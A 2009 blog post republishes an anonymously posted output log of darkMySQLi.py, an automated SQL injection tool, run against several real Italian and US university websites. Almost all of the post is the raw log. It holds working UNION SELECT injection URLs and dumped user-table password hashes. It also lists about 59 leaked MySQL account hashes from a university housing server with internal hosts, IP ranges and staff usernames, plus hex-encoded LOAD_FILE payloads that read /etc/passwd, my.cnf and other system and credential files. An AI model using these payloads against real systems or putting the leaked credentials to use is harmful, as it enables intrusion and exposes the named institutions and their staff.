Monday, July 20, 2009

Multiple hosts SQL injection hack log

This appears to be the output of an automatic SQL injection exploit tool run against a few sites. One particular university seems to have been hit hard.

Posted by Anonymous on Fri 17 Jul 22:52
  1.  
  2. |--------------------------------------------------|
  3. | rsauron@gmail.com                         v1.6   |
  4. |   1/2009      darkMySQLi.py                      |
  5. |     -- Multi Purpose MySQL Injection Tool --     |
  6. | Usage: darkMySQLi.py [options]                   |
  7. |                      -h help       darkc0de.com  |
  8. |--------------------------------------------------|
  9.  
  10. [+] URL: http://www.uis[CENSORED].it/news.php?n=351+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de
  11. [+] 19:13:05
  12. [+] Evasion: + --
  13. [+] Cookie: None
  14. [+] SSL: No
  15. [+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
  16. [+] Proxy Not Given
  17. [+] Gathering MySQL Server Configuration...
  18.         Database: lazio
  19.         User: uisp@localhost
  20.         Version: 4.0.25-log
  21. |--------------------------------------------------|
  22. | rsauron@gmail.com                         v1.6   |
  23. |   1/2009      darkMySQLi.py                      |
  24. |     -- Multi Purpose MySQL Injection Tool --     |
  25. | Usage: darkMySQLi.py [options]                   |
  26. |                      -h help       darkc0de.com  |
  27. |--------------------------------------------------|
  28.  
  29. [+] URL: http://www.uis[CENSORED].it/news.php?n=351+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de
  30. [+] 19:15:02
  31. [+] Evasion: + --
  32. [+] Cookie: None
  33. [+] SSL: No
  34. [+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
  35. [+] Proxy Not Given
  36. [+] Gathering MySQL Server Configuration...
  37.         Database: lazio
  38.         User: uisp@localhost
  39.         Version: 4.0.25-log[+] Beginning table and column fuzzer...
  40. [+] Number of tables names to be fuzzed: 87
  41. [+] Number of column names to be fuzzed: 125
  42. [+] Searching for tables and columns...
  43.  
  44. [+] Found a table called: user
  45.  
  46. [+] Now searching for columns inside table "user"
  47. [-] Done searching inside table "user" for columns!
  48.  
  49. [+] Found a table called: mysql.user
  50.  
  51. [+] Now searching for columns inside table "mysql.user"
  52. [-] Done searching inside table "mysql.user" for columns!
  53.  
  54. [+] Found a table called: news
  55.  
  56. [+] Now searching for columns inside table "news"
  57. [-] Done searching inside table "news" for columns!
  58.  
  59. [-] [19:23:35]
  60. [-] Total URL Requests: 463
  61. [-] Done
  62.  
  63. |--------------------------------------------------|
  64. | rsauron@gmail.com                         v1.6   |
  65. |   1/2009      darkMySQLi.py                      |
  66. |     -- Multi Purpose MySQL Injection Tool --     |
  67. | Usage: darkMySQLi.py [options]                   |
  68. |                      -h help       darkc0de.com  |
  69. |--------------------------------------------------|
  70.  
  71. [+] URL: http://www.uis[CENSORED].it/news.php?n=351+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de
  72. [+] 19:23:46
  73. [+] Evasion: + --
  74. [+] Cookie: None
  75. [+] SSL: No
  76. [+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
  77. [+] Proxy Not Given
  78. [+] Gathering MySQL Server Configuration...
  79.         Database: lazio
  80.         User: uisp@localhost
  81.         Version: 4.0.25-log
  82. [+] Dumping data from database "lazio" Table "user"
  83. [+] Column(s) ['id_user', 'password']
  84. [+] Number of Rows: 3
  85.  
  86. [1] 1:43d97712a3d49112c478ff42e7a3cd69:
  87. [2] 2:ba50d008b5b8e57b7764d8319369eeb6:
  88. [3] 3:a472c4f62f70e7d432f4444b8c7c1642:
  89.  
  90. [-] [19:23:48]
  91. [-] Total URL Requests: 5
  92. [-] Done
  93.  
  94. |--------------------------------------------------|
  95. | rsauron@gmail.com                         v1.6   |
  96. |   1/2009      darkMySQLi.py                      |
  97. |     -- Multi Purpose MySQL Injection Tool --     |
  98. | Usage: darkMySQLi.py [options]                   |
  99. |                      -h help       darkc0de.com  |
  100. |--------------------------------------------------|
  101.  
  102. [+] URL: http://[CENSORED].edu/article.php?pid=5+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5
  103. [+] 20:51:38
  104. [+] Evasion: + --
  105. [+] Cookie: None
  106. [+] SSL: No
  107. [+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
  108. [+] Proxy Not Given
  109. [+] Gathering MySQL Server Configuration...
  110.         Database: linux
  111.         User: linux@web-4.uta.edu
  112.         Version: 5.0.45-log
  113.  
  114. [+] Do we have Access to MySQL Database: NO
  115.  
  116. [-] MySQL user enumeration has been skipped!
  117. [-] We do not have access to mysql DB on this target!
  118.  
  119. [+] Do we have Access to Load_File: NO
  120.  
  121. [-] Load_File Fuzzer has been by skipped!
  122. [-] Load_File disabled on this target!
  123.  
  124. [-] [20:51:45]
  125. [-] Total URL Requests: 3
  126. [-] Done
  127.  
  128. |--------------------------------------------------|
  129. | rsauron@gmail.com                         v1.6   |
  130. |   1/2009      darkMySQLi.py                      |
  131. |     -- Multi Purpose MySQL Injection Tool --     |
  132. | Usage: darkMySQLi.py [options]                   |
  133. |                      -h help       darkc0de.com  |
  134. |--------------------------------------------------|
  135.  
  136. [+] URL: http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+darkc0de,2,3,4,5,darkc0de,darkc0de,8,darkc0de,10
  137. [+] 20:53:38
  138. [+] Evasion: + --
  139. [+] Cookie: None
  140. [+] SSL: No
  141. [+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
  142. [+] Proxy Not Given
  143. [+] Gathering MySQL Server Configuration...
  144.         Database: news
  145.         User: root@jupiter.housing.[CENSORED].edu
  146.         Version: 4.1.20-log
  147.  
  148. [+] Do we have Access to MySQL Database: YES <-- w00t w00t
  149.  
  150. [+] Dumping MySQL user info. host:user:password[+] Number of users in the mysql.user table: 59
  151. [0] localhost:root:1d7061767ec0f189
  152. [1] trogdor:root:
  153. [2] localhost::1d7061767ec0f189
  154. [3] trogdor::
  155. [4] *:root:1d7061767ec0f189
  156. [5] %:root:1d7061767ec0f189
  157. [6] localhost:nagios:62068042172418e8
  158. [7] 128.104.56.%:infotech:1d7061767ec0f189
  159. [8] %:housingwebserver:5d5deacd6a134128
  160. [9] 146.151.2.%:infotech:1d7061767ec0f189
  161. [10] *:housingwebserver:5d5deacd6a134128
  162. [11] localhost.localdomain:root:1d7061767ec0f189
  163. [12] %:wiki:71a82a1928270347
  164. [13] localhost:wiki:71a82a1928270347
  165. [14] localhost.localdomain:wiki:71a82a1928270347
  166. [15] %:aesop:*DBE8FC7F0D38B886FF717773D166C88A53057AA7
  167. [16] 10.146.%.%:aesop:*DBE8FC7F0D38B886FF717773D166C88A53057AA7
  168. [17] jupiter%.housing.[CENSORED].edu:labman:*1BA54CAC1C9DBADFE5285D2FF6B943B0C9AC3351
  169. [18] 128.104.56.68:labman:*1BA54CAC1C9DBADFE5285D2FF6B943B0C9AC3351
  170. [19] jupiter%.housing.[CENSORED].edu:mrbs:764628e26aff0ffb
  171. [20] 128.104.56.39:mrbs:764628e26aff0ffb
  172. [21] Jupiter2.housing.[CENSORED].edu:mrbs:764628e26aff0ffb
  173. [22] 128.104.56.39:labman:*1BA54CAC1C9DBADFE5285D2FF6B943B0C9AC3351
  174. [23] 128.104.56.75:labman:4e2e57e527392663
  175. [24] nathan-computer.housing.[CENSORED].edu:phpwebsite_admin:*FFE8FE6B11154482DD528AB354F12CD0925E41B8
  176. [25] jupiter%.housing.[CENSORED].edu:phpwebsite_user:*D87CDE2186BA156ED1F6101FC04EDA373A867F35
  177. [26] jupiter2.housing.[CENSORED].edu:phpwebsite_user:*D87CDE2186BA156ED1F6101FC04EDA373A867F35
  178. [27] 146.151.2.4:housingstaff:*CC8F28B6B48C7367BACFEFBAA17042275F56824B
  179. [28] 128.104.56.39:housingstaff:*CC8F28B6B48C7367BACFEFBAA17042275F56824B
  180. [29] jupiter%.housing.[CENSORED].edu:housingstaff:*CC8F28B6B48C7367BACFEFBAA17042275F56824B
  181. [30] 128.104.56.75:housingstaff:*CC8F28B6B48C7367BACFEFBAA17042275F56824B
  182. [31] jupiter%.housing.[CENSORED].edu:gaming_signup:*065954C938398AA43EBA15E9D52372CFAAB09847
  183. [32] jupiter%.housing.[CENSORED].edu:trecs:*BB5B9FF3DDA2C4E94761CBB828CA7BE4518C5A24
  184. [33] jupiter%.housing.[CENSORED].edu:trecs_read:*1753E38D50A040449857EE4ED9656FA31CC22502
  185. [34] dev-web.housing.[CENSORED].edu:trecs_test:*B431DCFD19306523BED0B7711790F55CE3EE501D
  186. [35] jupiter%.housing.[CENSORED].edu:comments:*CC967383FC43C582DCDB28EDCB44019E8287DAA7
  187. [36] jupiter%.housing.[CENSORED].edu:webauthorwiki:*CCF9043583D9D699CF84C30FAED87624B22247F5
  188. [37] jupiter%.housing.[CENSORED].edu:photos:*E66EA629FEC2AA58813A580ACCB2B1EBA942F745
  189. [38] jupiter%.housing.[CENSORED].edu:classconnections:*A853E757A87A7DC90918CEB189DF07AEF97E7F05
  190. [39] jupiter%.housing.[CENSORED].edu:rh_classes_read:*0DE4BF21764C68924261C00801A55E0D232FAAE2
  191. [40] jupiter%.housing.[CENSORED].edu:reshall_classes:*487E8FD6FB0B7C95A6F0E251573D55AD9B08D672
  192. [41] jupiter%.housing.[CENSORED].edu:interestconns:*93E27F1224D58430FA884F5F70B2EDE20B63DB5C
  193. [42] jupiter%.housing.[CENSORED].edu:halldeskforum:*DB062717E8903030F561017B065F01A740AA2337
  194. [43] jupiter%.housing.[CENSORED].edu:intconns_read:*E59C798F5717FA359DA1976077139ECB0D1CCB76
  195. [44] jupiter%.housing.[CENSORED].edu:omega_read:*D98F1D2016D595FAE351D2D1971856F84DBE0FE3
  196. [45] jupiter%.housing.[CENSORED].edu:omega:*5BF8DD2EE06D24BF323934998EBACBA74D1DF1A8
  197. [46] jupiter%.housing.[CENSORED].edu:tutor_log:*D367B908E558098D85E781831A7829DA9CE22C52
  198. [47] jupiter%.housing.[CENSORED].edu:reslife_testing:*15AE030DF51D192AA5A9CDDB7637092726114FE4
  199. [48] %.housing.[CENSORED].edu:eweiss:*05391D93ACA052EF907794B253F0626D37DE93F0
  200. [49] %housing.[CENSORED].edu:reslife_testing:
  201. [50] %.housing.[CENSORED].edu:jpmielens:*7AC527A8617BDCEAAFC80CB8B8324747999B91E9
  202. [51] %.housing.[CENSORED].edu:cherwinka:*E7FBCBE21AF99DE865DAD8C32059DE1F1332DE7E
  203. [52] %.housing.[CENSORED].edu:efhanson:*74335AFE095A7B1948E0D3A2869E72B3DE07758D
  204. [53] jupiter%.housing.[CENSORED].edu:events_read:*D3D085E058505D0D626133425CF466DB1763B3A9
  205. [54] jupiter%.housing.[CENSORED].edu:eventscalendar:*5B9EA7F5EAC55A69EB9875648B47A49798224DCD
  206. [55] jupiter%.housing.[CENSORED].edu:studygroups:*3133D9DF58AC305F79CA7FB14550F052C0B1E2F1
  207. [56] %.housing.[CENSORED].edu:hwerner:*CD9CEFEBF56C7BD770A126DAAB50E156792457BE
  208. [57] hsg-lae006.housing.[CENSORED].edu:root:*06D8B6D09ED6313722D02AC093B342CB35B3CD06
  209. [58] %.housing.[CENSORED].edu:omega_dev:*3ED288D0DA311DF6100147818E80BA2F82C13676
  210.  
  211. [+] Do we have Access to Load_File: YES <-- w00t w00t
  212.  
  213. [+] Starting Load_File Fuzzer...
  214. [+] Number of tables names to be fuzzed: 237
  215.  
  216. [!] Found /etc/passwd
  217. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,LOAD_FILE(0x2f6574632f706173737764),LOAD_FILE(0x2f6574632f706173737764),8,LOAD_FILE(0x2f6574632f706173737764),10--
  218. [!] Found /etc/hosts
  219. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f686f737473),2,3,4,5,LOAD_FILE(0x2f6574632f686f737473),LOAD_FILE(0x2f6574632f686f737473),8,LOAD_FILE(0x2f6574632f686f737473),10--
  220. [!] Found /etc/motd
  221. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6d6f7464),2,3,4,5,LOAD_FILE(0x2f6574632f6d6f7464),LOAD_FILE(0x2f6574632f6d6f7464),8,LOAD_FILE(0x2f6574632f6d6f7464),10--
  222. [!] Found /etc/fstab
  223. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6673746162),2,3,4,5,LOAD_FILE(0x2f6574632f6673746162),LOAD_FILE(0x2f6574632f6673746162),8,LOAD_FILE(0x2f6574632f6673746162),10--
  224. [!] Found /etc/httpd/conf/httpd.conf
  225. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),2,3,4,5,LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),8,LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),10--
  226. [!] Found /etc/my.cnf
  227. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6d792e636e66),2,3,4,5,LOAD_FILE(0x2f6574632f6d792e636e66),LOAD_FILE(0x2f6574632f6d792e636e66),8,LOAD_FILE(0x2f6574632f6d792e636e66),10--
  228. [!] Found /etc/sysconfig/network-scripts/ifcfg-eth0
  229. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),2,3,4,5,LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),8,LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),10--
  230. [!] Found /etc/redhat-release
  231. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),2,3,4,5,LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),8,LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),10--
  232. [!] Found /etc/httpd/conf.d/php.conf
  233. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),2,3,4,5,LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),8,LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),10--
  234. [!] Found /etc/group
  235. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f67726f7570),2,3,4,5,LOAD_FILE(0x2f6574632f67726f7570),LOAD_FILE(0x2f6574632f67726f7570),8,LOAD_FILE(0x2f6574632f67726f7570),10--
  236. [!] Found /etc/php.ini
  237. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f7068702e696e69),2,3,4,5,LOAD_FILE(0x2f6574632f7068702e696e69),LOAD_FILE(0x2f6574632f7068702e696e69),8,LOAD_FILE(0x2f6574632f7068702e696e69),10--
  238.  
  239. [-] [21:00:32]
  240. [-] Total URL Requests: 301
  241. [-] Done
  242.  
  243. |--------------------------------------------------|
  244. | rsauron@gmail.com                         v1.6   |
  245. |   1/2009      darkMySQLi.py                      |
  246. |     -- Multi Purpose MySQL Injection Tool --     |
  247. | Usage: darkMySQLi.py [options]                   |
  248. |                      -h help       darkc0de.com  |
  249. |--------------------------------------------------|
  250.  
  251. [+] URL: http://www.[CENSORED].it/lettere_direttore/commenti.php?artid=1165+AND+1=2+UNION+SELECT+1,2,3,darkc0de,5,6,7
  252. [+] 21:08:29
  253. [+] Evasion: + --
  254. [+] Cookie: None
  255. [+] SSL: No
  256. [+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
  257. [+] Proxy Not Given
  258. [+] Gathering MySQL Server Configuration...
  259.         Database: [CENSORED]
  260.         User: [CENSORED]@localhost
  261.         Version: 5.0.45-log
  262.  
  263. [+] Do we have Access to MySQL Database: NO
  264.  
  265. [-] MySQL user enumeration has been skipped!
  266. [-] We do not have access to mysql DB on this target!
  267.  
  268. [+] Do we have Access to Load_File: NO
  269.  
  270. [-] Load_File Fuzzer has been by skipped!
  271. [-] Load_File disabled on this target!
  272.  
  273. [-] [21:08:32]
  274. [-] Total URL Requests: 3
  275. [-] Done
Bookmark this post with:
Posted by Chuck at 11:19 AM
Labels: , , ,
blog comments powered by Disqus
Subscribe to: Post Comments (Atom)